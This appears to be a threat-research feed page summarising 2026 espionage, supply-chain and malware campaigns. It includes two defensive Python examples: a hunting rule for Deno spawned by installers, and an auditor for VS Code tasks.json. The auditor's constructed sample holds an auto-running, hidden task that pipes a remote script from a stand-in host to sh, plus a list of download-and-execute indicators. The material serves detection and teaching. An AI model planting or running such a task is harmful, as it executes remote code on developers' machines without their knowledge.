Threat Research

    Pervasive SSH tunnel activity from 2025 persisted into 2026, targeting Russian and Belarusian entities. The cyberespionage group Cloud Atlas, active since 2014, is behind some of these attacks. Recent investigations revealed new tools and indicators of compromise linked to the group. They have resumed using malicious shortcut archives to launch PowerShell scripts....
    Threat actors are actively exploiting multiple vulnerabilities affecting Cisco Catalyst SD-WAN products, including the authentication bypass flaw CVE-2026-20182, which allows remote attackers to gain administrative access without authentication....
    Our research examined the April 22 Checkmarx KICS and April 24 elementary-data incidents as part of a broader TeamPCP supply chain campaign involving at least seven confirmed waves. The KICS attack used multichannel poisoning across Docker Hub, VS Code/OpenVSX, and GitHub Actions, later enabling the hijack of @bitwarden/cli through stolen npm tokens....
    CVE-2026-41940 is a severe authentication bypass flaw (CVSS score: 9.8) impacting cPanel and WHM. The vulnerability allows remote attackers to circumvent the authentication mechanism and obtain unauthorized access without requiring legitimate credentials....
    The EtherRAT malware family was first identified by Sysdig in December 2025, initially exploiting CVE-2025-55182 (React2Shell) on Linux servers. In March 2026, Atos reported a Windows-based EtherRAT campaign with activity traced back to December 2025....
    A newly identified set of China-aligned campaigns is targeting government entities and critical infrastructure across South, East, and Southeast Asia, plus one NATO member state. This activity is being tracked as SHADOW-EARTH-053....
    The increasing reliance on AI has led to a surge in AI-driven tools. However, these platforms can also be exploited for malicious purposes, as demonstrated in the case of Kuse.ai. While Kuse is generally regarded as a reliable workplace solution, threat actors continuously develop new social engineering tactics....
    DinDoor, a malware variant linked to the Tsundere botnet and associated with the Iranian APT group Seedworm (MuddyWater), leverages the Deno runtime to execute obfuscated JavaScript for command-and-control communication and victim fingerprinting. Delivered via MSI installers, it exploits gaps in monitoring for less commonly tracked runtimes....
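The monitoring gap described above is the point of the technique: Deno is rarely baselined, so a Deno process spawned by an installer is easy to miss. The following is an added hunting example, not code from the original post or from the research team; it runs over constructed Sysmon-style process-creation events (the paths, parent/child pairing and command lines are all invented for illustration) and flags an uncommon runtime when its parent is an installer, when it is handed an inline or remote script, when it is granted network access, or when its script lives in a user-writable directory. The runtime set, installer set and path hints are assumptions to tune per environment.

```python
# Hunting heuristic for script runtimes that are rarely baselined (here: Deno, Bun).
# Input shape follows Sysmon Event ID 1 field names; the events below are constructed.

UNCOMMON_RUNTIMES = {"deno.exe", "bun.exe"}   # assumption: runtimes with no normal footprint in this estate
INSTALLER_PARENTS = {"msiexec.exe"}           # MSI delivery, as described for DinDoor
SCRIPT_SUBCOMMANDS = {"run", "eval"}          # deno/bun subcommands that execute code
USER_WRITABLE_HINTS = ("\\temp\\", "\\appdata\\", "\\downloads\\", "\\public\\")

# Constructed sample telemetry (not real logs). Event 1 is the installer itself, event 2 the
# runtime it spawns, event 3 a developer running tests, event 4 a commonly tracked runtime.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\u\Downloads\update.msi /qn"},
    {"Image": r"C:\Users\u\AppData\Local\deno\deno.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"deno.exe run --allow-net --allow-read C:\Users\u\AppData\Local\Temp\loader.js"},
    {"Image": r"C:\Users\dev\.deno\bin\deno.exe",
     "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "CommandLine": r"deno.exe test"},
    {"Image": r"C:\Program Files\nodejs\node.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": 'node.exe -e "console.log(1)"'},
]


def _basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess_event(event):
    """Return the reasons this process-creation event looks like runtime abuse ([] if none)."""
    if _basename(event["Image"]) not in UNCOMMON_RUNTIMES:
        return []
    reasons = []
    if _basename(event["ParentImage"]) in INSTALLER_PARENTS:
        reasons.append("runtime spawned by an installer process")
    tokens = event["CommandLine"].lower().split()
    subcommand = tokens[1] if len(tokens) > 1 else ""
    if subcommand == "eval":
        reasons.append("inline script passed on the command line")
    if subcommand in SCRIPT_SUBCOMMANDS and "--allow-net" in tokens:
        reasons.append("script granted network access")
    if any(t.startswith(("http://", "https://")) for t in tokens[1:]):
        reasons.append("script fetched from a remote URL")
    if any(hint in t for t in tokens for hint in USER_WRITABLE_HINTS):
        reasons.append("script located in a user-writable directory")
    return reasons


def hunt(events):
    """Run assess_event over a batch and keep only the events that produced findings."""
    return [(event, reasons) for event in events if (reasons := assess_event(event))]


if __name__ == "__main__":
    for event, reasons in hunt(SAMPLE_EVENTS):
        print(event["CommandLine"])
        for reason in reasons:
            print("  -", reason)
```

Only the Deno process launched by msiexec.exe is reported; the developer's `deno.exe test` under VS Code produces no findings, which is the distinction a rule like this has to make before it is useful in production.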
    Void Dokkaebi (Famous Chollima) has advanced from targeted social engineering into a self-spreading supply chain threat. Compromised developer repositories act as infection hubs, propagating malware across the developer ecosystem like a worm. It exploits trusted workflows using malicious VS Code tasks and injected code that runs during normal development....
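A VS Code task can be configured to start automatically when a folder is opened (`"runOptions": {"runOn": "folderOpen"}`), which is what makes a poisoned repository run code during normal development. The following is an added example, not code from the original post or from the research team: a small auditor for a repository's `.vscode/tasks.json` that reports tasks set to auto-run, tasks whose output is hidden, and tasks whose command or arguments match coarse download-and-execute indicators. The sample `tasks.json` is constructed for illustration, the indicator list is an assumption to extend, and the parser assumes strict JSON (VS Code also accepts comments, which `json.loads` rejects).

```python
import json

# Coarse substrings that suggest a task downloads or decodes code and runs it. Assumption: tune per team.
SUSPICIOUS_PATTERNS = (
    "curl ", "wget ", "invoke-webrequest", "iwr ", "invoke-expression", " iex",
    "| sh", "| bash", "base64 -d", "frombase64string", "-encodedcommand", " -enc ",
)

# Constructed sample .vscode/tasks.json (not from any real repository): one honest build task
# and one task that runs on folder open, hides its terminal, and pipes a remote script to sh.
SAMPLE_TASKS_JSON = r'''
{
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", "group": "build" },
    {
      "label": "prepare env",
      "type": "shell",
      "command": "curl -s https://example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }
    }
  ]
}
'''


def _command_strings(task):
    """Collect the command plus args from the task and its windows/linux/osx overrides."""
    parts = []
    for scope in (task, task.get("windows", {}), task.get("linux", {}), task.get("osx", {})):
        cmd = scope.get("command", "")
        if isinstance(cmd, dict):           # VS Code allows {"value": ..., "quoting": ...}
            cmd = cmd.get("value", "")
        args = [a.get("value", "") if isinstance(a, dict) else str(a) for a in scope.get("args", [])]
        if cmd or args:
            parts.append(" ".join([cmd, *args]).strip())
    return parts


def audit_tasks(text):
    """Return one finding per task that auto-runs or matches a suspicious pattern."""
    doc = json.loads(text)
    findings = []
    for task in doc.get("tasks", []):
        auto_run = task.get("runOptions", {}).get("runOn") == "folderOpen"
        hidden = task.get("presentation", {}).get("reveal") == "never"
        full = " || ".join(_command_strings(task))
        indicators = [p for p in SUSPICIOUS_PATTERNS if p in full.lower()]
        if auto_run or indicators:
            findings.append({
                "label": task.get("label", "<unlabelled>"),
                "auto_run": auto_run,
                "hidden": hidden,
                "indicators": indicators,
                "command": full,
            })
    return findings


if __name__ == "__main__":
    for f in audit_tasks(SAMPLE_TASKS_JSON):
        flags = ["auto-run" if f["auto_run"] else "", "hidden" if f["hidden"] else ""]
        print(f["label"], [x for x in flags if x], f["indicators"], "->", f["command"])
```

Run this against a freshly cloned repository before opening it in the editor; a task that both auto-runs and hides its terminal is worth a look even when its command matches nothing in the indicator list.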
    CrySome RAT represents a modular, userland-focused post-exploitation framework emphasizing persistence, evasion, and operator control (keylogger, credential harvesting, RDP, HVNC). While it does not exhibit kernel-level sophistication, its combination of defense evasion techniques and surveillance capabilities makes it effective against poorly monitored environments....